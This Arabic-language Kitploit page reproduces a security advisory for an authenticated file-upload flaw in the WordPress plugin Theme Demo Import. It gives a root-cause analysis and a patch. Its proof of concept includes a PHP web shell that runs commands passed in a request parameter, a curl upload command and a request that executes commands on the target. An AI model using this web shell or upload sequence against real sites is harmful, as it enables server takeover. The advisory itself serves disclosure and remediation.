Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-13157 — إثبات المفهوم وتحليل السبب الجذري لثغرة رفع ملفات تعسّفي بعد المصادقة في WordPress Theme Demo Import تؤدي إلى تنفيذ تعليمات برمجية عن بُعد عبر قشرة ويب PHP. | Kitploit
أدوات/GitHubGitHub/minhhk68/cve-2026-13157
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقتطوير الحمولات
GitHubminhhk68/cve-2026-13157

CVE-2026-13157

إثبات المفهوم وتحليل السبب الجذري لثغرة رفع ملفات تعسّفي بعد المصادقة في WordPress Theme Demo Import تؤدي إلى تنفيذ تعليمات برمجية عن بُعد عبر قشرة ويب PHP.

عرض المستودع
منذ 19 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

[CVE-2026-13157] Theme Demo Import <= 1.1.3 — رفع ملفات تعسفي وتنفيذ أوامر عن بُعد

WPScan Verified Advisory CVSS 6.6 Medium Discovered by Huynh Kien Minh


📖 نظرة عامة على الاستشارة الأمنية

تُعد CVE-2026-13157 ثغرة رفع ملفات تعسفي تتطلب مصادقة، وتؤثر على إضافة Theme Demo Import لووردبريس في الإصدارات حتى 1.1.3 وما يشمله، وقد اكتشفها وحللها باحث الأمن السيبراني Huynh Kien Minh (MinhHK). توجد الثغرة داخل روتين استيراد العرض التجريبي عبر AJAX (TDI_import_demo_data)، حيث تعطّل الإضافة صراحةً اختبارات ووردبريس القياسية للتحقق من نوع الملف ('test_type' => false) أثناء معالجة الرفع. يمكن لمستخدم موثَّق يمتلك صلاحيات الاستيراد — مثل مسؤول الموقع الافتراضي أو مسؤول موقع غير Super Admin في بنية ووردبريس متعددة المواقع (Multisite) — تجاوز إنفاذ قيود الملفات لرفع نصوص PHP قابلة للتنفيذ بشكل تعسفي مباشرةً إلى الدليل العام wp-content/uploads/، محققًا تنفيذ أوامر عن بُعد (RCE) مستدامًا واختراقًا كاملًا للخادم.


📌 الملخص التنفيذي


🔍 السبب الجذري وتحليل الكود

يكمن السبب الجذري لثغرة CVE-2026-13157 في معمارية معالجة رفع الملفات المُنفَّذة في inc/class-tdi-helpers.php. أثناء عمليات استيراد بيانات العرض التجريبي، تتعامل الإضافة مع مرفقات الملفات الواردة عبر نقطة نهاية AJAX المسجَّلة في inc/class-tdi-main.php عند السطر 55:

root@kitploit:~
// inc/class-tdi-main.php: Line 55
add_action( 'wp_ajax_TDI_import_demo_data', array( $this, 'import_demo_data_ajax_callback' ) );

عند معالجة ملفات إعداد العرض التجريبي المُرفوعة (content_file وwidget_file وcustomizer_file)، يوجّه أسلوب الاستيراد الداخلي واجهة برمجة التطبيقات wp_handle_upload() في ووردبريس مباشرةً إلى تجاوز فحوصات التحقق من نوع MIME والنموذج:

root@kitploit:~
// inc/class-tdi-helpers.php: Lines 495 - 506
// Upload settings to disable form and type testing for AJAX uploads.
$upload_overrides = array(
    'test_form' => false,
    'test_type' => false, // CRITICAL VULNERABILITY: Disables MIME and file extension verification!
);

// Handle demo content and widgets file upload.
$content_file_info    = wp_handle_upload( $_FILES['content_file'], $upload_overrides );
$widget_file_info     = wp_handle_upload( $_FILES['widget_file'], $upload_overrides );
$customizer_file_info = wp_handle_upload( $_FILES['customizer_file'], $upload_overrides );

بتمرير 'test_type' => false إلى $upload_overrides، تجاوز المطوّر النظام الفرعي الأساسي للتحقق من MIME في ووردبريس (wp_check_filetype_and_ext()). وكنتيجة مباشرة، لم يعد التطبيق يقيّد مرفقات الملفات ببيانات العرض التجريبي الآمنة (.xml و.json و.wie و.dat)، مما يسمح لأي مستخدم موثَّق يملك حق الوصول إلى صفحة الإعدادات برفع نصوص PHP قابلة للتنفيذ (.php و.phtml و.phar) مباشرةً إلى جذر المستندات العام.


💻 إثبات المفهوم (PoC) للاستغلال

إخلاء مسؤولية البحث الأخلاقي: يُوثَّق إثبات المفهوم هذا بشكل صارم لأغراض التدقيق التعليمي والهندسة الدفاعية والتحقق الأمني المصرح به. يُحظر الاستغلال غير المصرح به للأنظمة الحية.

المتطلبات والإعداد

  • النظام المستهدف: تثبيت ووردبريس يشغّل إضافة Theme Demo Import بالإصدار <= 1.1.3.
  • متطلب الصلاحيات: جلسة موثَّقة تمتلك صلاحيات import (مسؤول / مسؤول موقع في Multisite).
  • استخراج رمز Nonce الأمني: استخرج رمز أمان AJAX tdi-ajax-verification (المكشوف في DOM الصفحة كخاصية كائن JavaScript باسم tdi.ajax_nonce على /wp-admin/themes.php?page=theme-demo-import).

خطوات إعادة الإنتاج

  1. أنشئ حمولة ويب شل محلية بعنوان exploit_webshell.php:
root@kitploit:~
<?php 
if(isset($_REQUEST['cmd'])){
    system($_REQUEST['cmd']);
} else {
    echo "CVE-2026-13157 Exploitation Verified by Huynh Kien Minh!";
}
?>
  1. نفّذ الحمولة متعددة الأجزاء الموثَّقة عبر cURL مستهدفًا موزّع AJAX الإداري:
root@kitploit:~
curl -i -s -X POST "http://<TARGET_HOST>/wp-admin/admin-ajax.php" \
  -H "Cookie: wordpress_logged_in_xxxxxx=yyyyyy" \
  -F "action=TDI_import_demo_data" \
  -F "security=<RETRIEVED_TDI_AJAX_NONCE>" \
  -F "content_file=@exploit_webshell.php;type=application/x-php"
  1. يردّ الخادم بتأكيد JSON إيجابي لعملية الرفع. يمكنك الوصول إلى الملف القابل للتنفيذ المُرفوع مباشرةً داخل الدليل الشهري المخصص لتشغيل تنفيذ الأوامر عن بُعد:
root@kitploit:~
GET /wp-content/uploads/2026/08/exploit_webshell.php?cmd=whoami HTTP/1.1
Host: <TARGET_HOST>

💥 نمذجة التهديدات وسيناريوهات التأثير في Multisite

بينما تمنح تثبيتات ووردبريس أحادية الموقع للمسؤولين القياسيين سيطرة موثوقة على بيئة الخادم، تُحدث CVE-2026-13157 انهيارًا خطيرًا للحدود الأمنية في النشر المؤسسي ومتعدد المواقع (Multisite):

  1. تصعيد الصلاحيات في ووردبريس Multisite (من مسؤول موقع إلى RCE كـ Super Admin): في بنية WordPress Multisite، يُقيَّد مسؤولو المواقع الفرديون عمدًا بتصميم النواة من تثبيت الإضافات أو تعديل القوالب أو رفع امتدادات نصوص برمجية غير آمنة (صلاحية unfiltered_upload محجوزة حصريًا لمشرفي الشبكة Super Admins). تحطّم CVE-2026-13157 هذا العزل بين المستأجرين المتعددين تمامًا، مما يتيح لمسؤول موقع فرعي غير موثوق إسقاط ويب شل وتنفيذ أوامر النظام عبر شبكة الخادم بأكملها.
  2. تجاوز حدود الاستضافة المُدارة لووردبريس: تقيّد منصات الاستضافة الآمنة الحديثة أذونات تعديل الملفات وتعطّل قدرات محرر الملفات (DISALLOW_FILE_EDIT). تلتف هذه الثغرة حول قيود الاستضافة عبر استغلال آلية نقل الملفات الأصلية للإضافة لكتابة كود قابل للتنفيذ تعسفي مباشرةً في وحدة التخزين القابلة للكتابة.

🛡️ المعالجة ومعمارية التصحيح

لحل CVE-2026-13157 بشكل آمن، يجب على القائمين على صيانة البرمجيات ومهندسي الدفاع إعادة فرض التحقق الصارم من نوع MIME وامتداد الملف فورًا داخل منطق معالجة الرفع في inc/class-tdi-helpers.php.

الكود البديل الآمن

احذف التجاوز غير الآمن 'test_type' => false وفرض قائمة سماح صارمة مقيّدة حصريًا بهياكل التصدير القياسية في ووردبريس (text/xml وapplication/json):

root@kitploit:~
// Secure Remediation Patch for inc/class-tdi-helpers.php (Lines 495 - 510)
$upload_overrides = array(
    'test_form' => false,
    'test_type' => true, // Enforce strict core file-type verification
    'mimes'     => array(
        'xml'  => 'text/xml',
        'json' => 'application/json',
        'wie'  => 'application/json',
        'dat'  => 'text/plain',
    ),
);

// Perform capability check before handling upload
if ( ! current_user_can( 'import' ) ) {
    wp_send_json_error( array( 'message' => __( 'Insufficient privileges to perform import.', 'theme-demo-import' ) ), 403 );
}

// Proceed with validated file handling
$content_file_info    = wp_handle_upload( $_FILES['content_file'], $upload_overrides );
$widget_file_info     = wp_handle_upload( $_FILES['widget_file'], $upload_overrides );
$customizer_file_info = wp_handle_upload( $_FILES['customizer_file'], $upload_overrides );

🏆 عن الباحث

Huynh Kien Minh (MinhHK) هو باحث في أمن المعلومات، ومطوّر برمجيات، ومحلل ثغرات متخصص في أمن تطبيقات الويب الهجومي، وتدقيق معمارية تطبيقات PHP، ونواقل الاستغلال المؤسسية. وقد حظيت اكتشافاته واستشاراته الفنية باعتراف رسمي من كبرى قواعد بيانات الثغرات العالمية وسلطات تسمية أمان المنتجات.

  • 🌐 ملف الباحث الرسمي: https://minhhk.web.app/
  • 🐙 مختبر أمان GitHub ومستودعات PoC: https://github.com/MinhHK68
  • 🛡️ استشارة أمنية موثَّقة من WPScan: تقرير WPScan عن CVE-2026-13157

📊 بيانات وصفية منظمة (JSON-LD)

root@kitploit:~
{
  "@context": "https://schema.org",
  "@graph": [
    {
      "@type": "TechArticle",
      "@id": "https://github.com/MinhHK68/CVE-2026-13157#article",
      "headline": "CVE-2026-13157: Theme Demo Import Arbitrary File Upload & Remote Code Execution Advisory",
      "alternativeHeadline": "Technical Deep-Dive and Exploit Analysis for CVE-2026-13157 by Huynh Kien Minh",
      "author": {
        "@type": "Person",
        "name": "Huynh Kien Minh",
        "alternateName": "MinhHK",
        "url": "https://minhhk.web.app/"
      },
      "datePublished": "2026-08-01",
      "inLanguage": "en-US",
      "description": "Comprehensive security research advisory for CVE-2026-13157 affecting Theme Demo Import WordPress plugin prior to version 1.1.3. Analyzes arbitrary file upload vulnerability via disabled test_type check leading to Remote Code Execution.",
      "keywords": ["CVE-2026-13157", "Theme Demo Import", "Arbitrary File Upload", "Remote Code Execution", "RCE", "WordPress Security", "Huynh Kien Minh", "MinhHK", "WPScan"]
    },
    {
      "@type": "SecurityAdvisory",
      "@id": "https://wpscan.com/vulnerability/5d6a6a8e-c224-4034-8ed5-2d63f37f9479/#advisory",
      "identifier": "CVE-2026-13157",
      "name": "Theme Demo Import <= 1.1.3 - Admin+ Arbitrary File Upload",
      "category": "Arbitrary File Upload / RCE",
      "cvssScore": "6.6",
      "severity": "Medium",
      "softwareVersion": "<= 1.1.3",
      "url": "https://wpscan.com/vulnerability/5d6a6a8e-c224-4034-8ed5-2d63f37f9479/"
    }
  ]
}
تنزيل الأداة
المعلمةالمواصفات الفنية
معرّف الثغرةCVE-2026-13157
البرنامج المستهدفTheme Demo Import (إضافة ووردبريس)
معرّف الإضافة (Slug)theme-demo-import
الإصدارات المتأثرة<= 1.1.3
تصنيف الثغرةرفع غير مقيد لملف بنوع خطير (CWE-434 / OWASP A03)
درجة CVSS v3.16.6 (متوسطة) (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)
المكتشف / الباحثHuynh Kien Minh (MinhHK)
جهة التحققWPScan / MITRE Corporation
رابط استشارة WPScanhttps://wpscan.com/vulnerability/5d6a6a8e-c224-4034-8ed5-2d63f37f9479/
ملف الباحثhttps://minhhk.web.app/